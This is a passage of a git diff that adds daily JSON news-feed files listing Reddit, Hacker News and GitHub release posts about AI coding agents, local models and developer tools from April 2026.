What to run in 2026?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-10T05:07:43.000Z", + "summary": "I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? ", + "category": "ai_models" + }, + { + "title": "making my own ai waifu app that can teach me any language.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-10T03:32:15.000Z", + "summary": "using gemma-4-E4B-it for the llm \nher voice is using omnivoice tts that i made the api using fastapi\n\n3d model made by me using vroid studio \nright now is support uploading image, search web, and using voice call and video call like grok ani.\n\ni'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model.", + "category": "ai_models" + }, + { + "title": "Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T03:16:52.000Z", + "summary": "I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense.\n\n# The core Idea is 
:\n\nInstead of relying on a small model (\\~2B params) to generate code from scratch (which is usually weak), the agent would\n\n1. search GitHub for relevant code\n\n2. use that as a reference\n\n3. copy + adapt existing implementations\n\n4. generate minimal edits instead of full solutions\n\nSo the model acts mo", + "category": "ai_models" + }, + { + "title": "is Agentic Commerce just the next buzzword for let’s automate your bank account?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T02:32:35.000Z", + "summary": "Just saw this TechNode article claiming \"AI agents\" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline.\n\nWe can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have \"agents\" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare.\n\nThink about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp", + "category": "ai_models" + }, + { + "title": "Started a video series on building an orchestration layer for LLM post-training [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-10T00:24:33.000Z", + "summary": "Hi everyone!\n\nContext, motivation, a lot of yapping, feel free to skip to TL;DR.\n\nA while back I posted here asking [\\[D\\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). 
Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. \n\nAt first I wasn't trying to build anything new. I mostly wanted to understand veRL p", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-11.json b/data/news-feed-2026-04-11.json new file mode 100644 index 0000000..371c3b4 --- /dev/null +++ b/data/news-feed-2026-04-11.json @@ -0,0 +1,249 @@ +{ + "generated": "2026-06-05T00:44:33.705Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-11", + "article_count": 15, + "archived_story_count": 346, + "articles": [ + { + "title": "How I made my Claude multimodal — now I just feed it videos", + "url": "https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-11T15:49:48.000Z", + "summary": "Claude + Qwen API\n\nFigured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action.\n\nNow I just drop a video straight into Claude and get back what I need.\n\nPackaged it as a plugin for easy setup.\n\ngithub.com/kirillbrsnkv/give-claude-eyes", + "category": "ai_tools" + }, + { + "title": "How to get Claude to run more autonomously", + "url": "https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-04-11T11:38:26.000Z", + "summary": "Hi! 
Can someone tell me how to get Claude to work more autonomously on a large task?\n\nA bit of context: \nI have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings.\n\nThe application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. Also a lot of properties are nullable, but not explicitly. 3k warnings currently.\n\nSuper tedious for a human ", + "category": "ai_tools" + }, + { + "title": "update on my ai waifu app, can use web search react to images even picture of herself", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-11T11:19:52.000Z", + "summary": "using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances)\n\nusing SerpApi for the web search\n\nthe tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api)\n\nmy ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag", + "category": "ai_models" + }, + { + "title": "I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki", + "url": "https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-11T08:42:01.000Z", + "summary": "If you run multiple agent 
CLIs daily, you've probably hit the same pain points I have:\n\n1. Too many terminal windows — impossible to find the one you need\n2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse\n3. Sharing files between agents means manually copying everything into the project folder\n\nI looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b", + "category": "ai_tools" + }, + { + "title": "I automated most of my job", + "url": "https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-10T14:03:08.000Z", + "summary": "I'm a software engineer with 11 yoe. I automated about 80% of my job with claude cli and a super simple dotnet console app.\n\nThe workflow is super simple:\n\n1. dotnet app calls our gitlab api for issues assigned to me\n\n2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description\n\n3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a", + "category": "ai_tools" + }, + { + "title": "I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it", + "url": "https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-04-11T08:37:14.000Z", + "summary": "Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. 
I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago.\n\nSo I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project.\n\nWhat it does fo", + "category": "ai_tools" + }, + { + "title": "I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out", + "url": "https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.96, + "date": "2026-04-11T09:58:19.000Z", + "summary": " \nBuilt with Claude Code, specifically for Claude Code users. Free, open source, MIT. \n \nWhat it does \n \nu/daik0z/claude-notify adds a Stop hook to \\~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: \"3 files edited · 2 commands \n\". \n \nnpm install -g u/daik0z/claude-notify \nclaude-notify setup \n \nWhat I learned from 374 downloads \n \nI sat down to stress-test it and foun", + "category": "ai_tools" + }, + { + "title": "ComfyUI workflow to fully python script?", + "url": "https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-11T23:25:36.000Z", + "summary": "Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python.\n\nWhy?\nI'm planning to use a multi-GPU server and I want to optimize for that.\n\nWhat libraries should I use? 
Is Diffusers the go-to or is there something better? Any tips from people who've done this?\n\nAlso, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those?\n\nThank you!", + "category": "creative_tools" + }, + { + "title": "Labs for Claude Certified Architect Foundations Exam", + "url": "https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-11T17:28:37.000Z", + "summary": "While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers.\n\n* Lab 01 - Customer Support Resolution Agent\n* Lab 02 - Code Generation Workflows\n* Lab 03 - Multi-Agent Research System\n* Lab 04 - Developer Productivity Agent\n* Lab 05 - CI/CD Integration\n* Lab 06 - Structured Data Extraction\n\n[https://github.", + "category": "ai_tools" + }, + { + "title": "FT - China’s Alibaba shifts towards revenue over open-source AI", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-11T17:23:20.000Z", + "summary": "[https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t)\n\n \nIs it true?", + "category": "ai_models" + }, + { + "title": "FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/", + "source": "Reddit 
r/MachineLearning", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-11T15:33:13.000Z", + "summary": "I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch.\n\nThe main goal is to make the progression across versions easier to understand from code.\n\nThis is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details.\n", + "category": "ai_research" + }, + { + "title": "I built a structured reasoning framework for Claude — because \"good output\" isn't enough", + "url": "https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-11T14:46:51.000Z", + "summary": "**I built a structured reasoning framework for Claude — because \"good output\" isn't enough**\n\nI kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up.\n\nSo I built CRC — Complex Reasoning Compiler. 
It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled.\n\nThe core idea:\n\n* Every complex task goes through a f", + "category": "ai_tools" + }, + { + "title": "Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-11T13:06:26.000Z", + "summary": "Posted here yesterday about the v1 cross-modal dataset. One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples.\n\nHuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal\nGitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/\nMIT licensed.\n\nThe repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and", + "category": "ai_models" + }, + { + "title": "Gemma 4 - Going Mad - - - Help!!!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-11T12:52:14.000Z", + "summary": "Hi All\n\nIm getting up to speed on LLMs and we are looking at Gemma4. \nWe are using a M3 Ultra with 512GB VRAM. So no dangers there.\n\nIm using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling.\n\nI have re-downloaded all the models this morning post the fixes. These are the unsloth ones. 
\n\nIm running llama.cpp - which i build on the server and is bang up to date.\n\nSo in opencode CLI - if i give it this prompt - its runs", + "category": "ai_models" + }, + { + "title": "Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-11T11:22:38.000Z", + "summary": "I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff.\n\nTried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists.\n\nIt includes:\n\n• local models (Ollama, Qwen, Llama etc) \n• free LLM APIs (OpenRouter, Groq, Gemini etc) \n• coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) \n• RAG stack tools (vector DBs, embeddings, frameworks) \n• agent frameworks and automati", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-12.json b/data/news-feed-2026-04-12.json new file mode 100644 index 0000000..e265916 --- /dev/null +++ b/data/news-feed-2026-04-12.json @@ -0,0 +1,168 @@ +{ + "generated": "2026-06-05T00:44:33.848Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-12", + "article_count": 10, + "archived_story_count": 109, + "articles": [ + { + "title": "JARVIS running on 3 servers as one fleet. 
Claude Code, Cursor, and OpenCode all coordinating.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-12T04:34:19.000Z", + "summary": "One instance is enough, but where is the fun in that right? 🤣\n\nJARVIS across 3 servers, each running a different AI coding agent:\n\n\\- Hel2: Claude Code CLI\n\n\\- Hel1: Cursor CLI\n\n\\- Mainframe: OpenCode \n\nThey talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. \n\nSame JARVIS, different hands. They don't just run. They coordinate.\n\nVideo is all 3 tmux sessions open at o", + "category": "ai_tools" + }, + { + "title": "Openclaw real costs: self hosting vs managed hosting vs API fees", + "url": "https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-12T06:27:27.000Z", + "summary": "Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. 
How much are people paying for self-hosting vs managed and is the price difference worth?", + "category": "ai_tools" + }, + { + "title": "OK I installed bitsandbytes but still getting error - Help please - thanks", + "url": "https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-12T01:55:27.000Z", + "summary": "Used terminal and installed it like so:\n\npip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\\_main/bitsandbytes-1.33.7.preview-py3-none-win\\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl)\n\n \nGetting error and StableDiffusion does not run\n\nFile \"C:\\\\Users\\\\123\\\\Downloads\\\\StabilityMatrix-win-x64\\\\Data\\\\Packages\\\\", + "category": "creative_tools" + }, + { + "title": "Meta released new paper : Neural Computers", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-12T06:54:27.000Z", + "summary": "What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. 
check more details : https://youtu.be/Evcgg-LG\\_jA?si=0h0bnM7qUsqDcKCJ\n\npaper : https://arxiv.org/abs/2604.06425", + "category": "ai_models" + }, + { + "title": "Open source agent stack that actually works in 2026 (no hype)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-12T06:16:49.000Z", + "summary": "been running this setup for a few months and wanted to share what actually works vs whats just github stars\n\nhermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. your agent on day 30 actually knows your projects and preferences\n\neverything c", + "category": "ai_models" + }, + { + "title": "MiniMax M2.7 is NOT open source - DOA License :(", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-12T02:55:38.000Z", + "summary": "Commercial use is banned without prior written permission from MiniMax.\n\nAnd their definition of \"commercial\" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. 
Military use is also explicitly prohibited- interesting.\n\nSo you can't use the model or any outputs for anything commercial!\n\nI'm really starting to hate these \"open weights, closed license\" models...\n\nhttps://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE", + "category": "ai_models" + }, + { + "title": "Does LTX 2.3 have good motion transfer?", + "url": "https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.9400000000000001, + "date": "2026-04-12T07:50:22.000Z", + "summary": "What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one?\n\n", + "category": "creative_tools" + }, + { + "title": "This is so good", + "url": "https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.86, + "date": "2026-04-12T03:35:24.000Z", + "summary": "Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. 
", + "category": "ai_tools" + }, + { + "title": "It seems ChatGPT leaked a JSON response (including API enpoint)", + "url": "https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.86, + "date": "2026-04-11T23:52:55.000Z", + "summary": "idk if this is visible in network requests, but chatgpt responded with \\[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\\\n \"error\": {\\\\n \"message\": \"You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.\",\\\\n \"type\": \"images\",\\\\n \"param\": nul", + "category": "ai_tools" + }, + { + "title": "MiniMax M2.7 Is Now Open Source", + "url": "https://firethering.com/minimax-m2-7-agentic-model/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.74, + "date": "2026-04-12T10:07:33.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-14.json b/data/news-feed-2026-04-14.json new file mode 100644 index 0000000..363235b --- /dev/null +++ b/data/news-feed-2026-04-14.json @@ -0,0 +1,255 @@ +{ + "generated": "2026-06-05T00:44:34.094Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-14", + "article_count": 15, + "archived_story_count": 271, + "articles": [ + { + "title": "hands on workshop: context engineering for multi agent systems [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "mcp", + 
"tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-13T15:56:23.000Z", + "summary": "hey everyone, sharing this because it's directly relevant to what a lot of people here are building.\n\npackt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman.\n\nwhat gets covered:\n\n\\- semantic blueprints for multi agent orchestration\n\n\\- MCP integration for standardized agent tool use\n\n\\- context window management across agents\n\n\\- high fidelity RAG pipelines with verifiable citations\n\n\\- safeguards against prompt injection and", + "category": "ai_research" + }, + { + "title": "Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)", + "url": "https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-14T20:58:35.000Z", + "summary": "I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware)\n\nWe recently added Docker Sandbox support and I wanted to share it here.\n\nThe idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal.\n\n`npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje", + "category": "ai_tools" + }, + { + "title": "How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). 
Open-source", + "url": "https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/", + "source": "Reddit r/ChatGPT", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-14T19:43:41.000Z", + "summary": "Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. \n\nAgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic.\n\nEach Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. And they're s", + "category": "ai_tools" + }, + { + "title": "pnpm v10.33.0 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v10.33.0", + "source": "GitHub Releases · pnpm", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-03-24T16:47:01.000Z", + "summary": "## Minor Changes\r\n\r\n* Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. 
This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070).\r\n\r\n## Patch Changes\r\n\r\n* Fail on incompatible lockfiles in CI when", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.37.2 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-13T20:19:57.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.6 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.6", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-10T13:23:09.000Z", + "summary": "\n\n## What's Changed\n### create-turbo\n* chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586\n### Examples\n* fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585\n### Changelog\n* docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul", + "category": "ai_tools" + }, + { + "title": "We're all building on top of something that changes under us every week, and nobody has a plan for that", + "url": "https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/", + 
"source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.9, + "date": "2026-04-14T09:46:57.000Z", + "summary": "I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation.\n\nEvery week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g", + "category": "ai_tools" + }, + { + "title": "Vercel CLI vercel@51.2.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-14T07:15:49.000Z", + "summary": "### Patch Changes\n\n- Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744))\n\n- Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. 
